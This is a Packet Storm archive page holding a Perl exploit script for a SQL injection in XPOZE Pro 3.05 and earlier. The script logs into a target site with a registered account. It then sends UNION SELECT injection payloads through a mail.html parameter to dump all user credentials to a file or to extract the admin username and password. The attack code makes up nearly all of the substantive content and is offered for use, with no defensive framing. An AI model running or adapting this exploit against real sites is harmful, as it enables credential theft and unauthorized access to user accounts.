what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xpoze-sql.txt

xpoze-sql.txt
Posted Apr 4, 2008
Authored by t0pp8uzz

XPOZE Pro versions 3.05 and below remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 1e6928a3827bb26276b7b5d7066a4dde93d2aae961e2ebc03e0dd531102e3b5c

xpoze-sql.txt

Change Mirror Download
#!/usr/bin/perl

# - XPOZE Pro <= 3.05 SQL Injection Exploit -
# Coded And Discovered by t0pP8uZz

# Why a exploit? mainly to dump all users easyily.
# Lots of websites are reslling this script, so there is no suitable dork.

use strict;
use LWP::UserAgent;

print "-------------------------------------------------\n";
print "- XPOZE Pro <= 3.05 SQL Injection Exploit -\n";
print "- Discovered & Coded By t0pP8uZz -\n";
print "- CipherCrew, h4ck-y0u.org, milw0rm.com -\n";
print "-------------------------------------------------\n\n";

print "Enter URL (ie: http://xpoze.com/demo/): ";
chomp(my $url = <STDIN>);

print "Enter Valid Username (register on target site first): ";
chomp(my $user = <STDIN>);

print "Enter Valid Password (register on target site first): ";
chomp(my $pass = <STDIN>);

print "Attack Type (enter 1 too dump all users, enter 2 too get admin details): ";
chomp(my $type = <STDIN>);

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
my $response = $ua->post($url, {'username' => $user, 'password' => $pass, 'login' => 'Submit'});

if($response->is_success()) {

if($type == 1) {

my $res = $ua->get($url."/account/user/mail.html?reed=-1 UNION ALL SELECT 1,2,3,4,concat(0x3C313E,user,0x3a,pass,0x3C323E),6,7 FROM users/*");
(my @users) = $res->content =~ /<1>(.*?)<2>/g;

open(FILE, "+>>C:\users.txt") or die ("Error Writing Users To File!");

foreach $user (@users) {
print FILE $user."\r\n";
print $user."\n";
}
close FILE;
print "Users Have Been Dumped To Local File 'C:\\users.txt'\n";

} elsif($type == 2) {

my $res = $ua->get($url."/account/user/mail.html?reed=-1 UNION ALL SELECT 1,2,3,4,concat(0x3C313E,user,0x3a,pass,0x3C323E),6,7 FROM users WHERE rank=0/*");
(my @users) = $res->content =~ /<1>(.*?)<2>/;

my @user = split(/:/, $users[0]);

print "\n\nAdmin Username: ".$user[0];
print "\nAdmin Password: ".$user[1];
print "\n\nDone!";

} else { print "Invalid Attack Type!"; exit; }
} else { print "Check username/password!"; exit; }
exit;

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close